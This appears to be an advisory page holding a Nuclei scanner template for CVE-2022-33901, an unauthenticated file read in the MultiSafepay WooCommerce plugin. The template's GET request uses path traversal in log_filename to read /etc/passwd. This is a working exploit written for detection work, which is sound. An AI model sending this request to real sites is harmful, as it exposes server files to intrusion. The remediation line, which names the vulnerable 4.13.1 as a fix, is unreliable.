WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read

2022-10-2109:45:06

ProjectDiscovery

github.com

cve2022

wp-plugin

wordpress

unauth

multisafepay

woocommerce

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.008 Low

EPSS

Percentile

82.1%

JSON

WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

id: CVE-2022-33901

info:
  name: WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read
  author: theamanrawat
  severity: high
  description: |
    WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    An attacker can access sensitive information stored in arbitrary files on the server, potentially leading to further compromise of the system.
  remediation: |
    Update WordPress MultiSafepay for WooCommerce plugin to version 4.13.1 or later.
  reference:
    - https://wordpress.org/plugins/multisafepay/
    - https://wordpress.org/plugins/multisafepay/#developers
    - https://patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-33901
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-33901
    epss-score: 0.00779
    epss-percentile: 0.81349
    cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: multisafepay
    product: multisafepay_plugin_for_woocommerce
    framework: wordpress
  tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202c7c635fcddb3574cb590e6287bc14534231ea48016d7df139749489a9d39b55022100d44004e450e95e1a53f364391d558635281fbca45027dca2e61e204f9bf30a53:922c64590222798bb761d5b6d8e72950

References

github.com/ARPSyndicate/kenzer-templates

nvd.nist.gov/vuln/detail/CVE-2022-33901

patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability

wordpress.org/plugins/multisafepay/

wordpress.org/plugins/multisafepay/#developers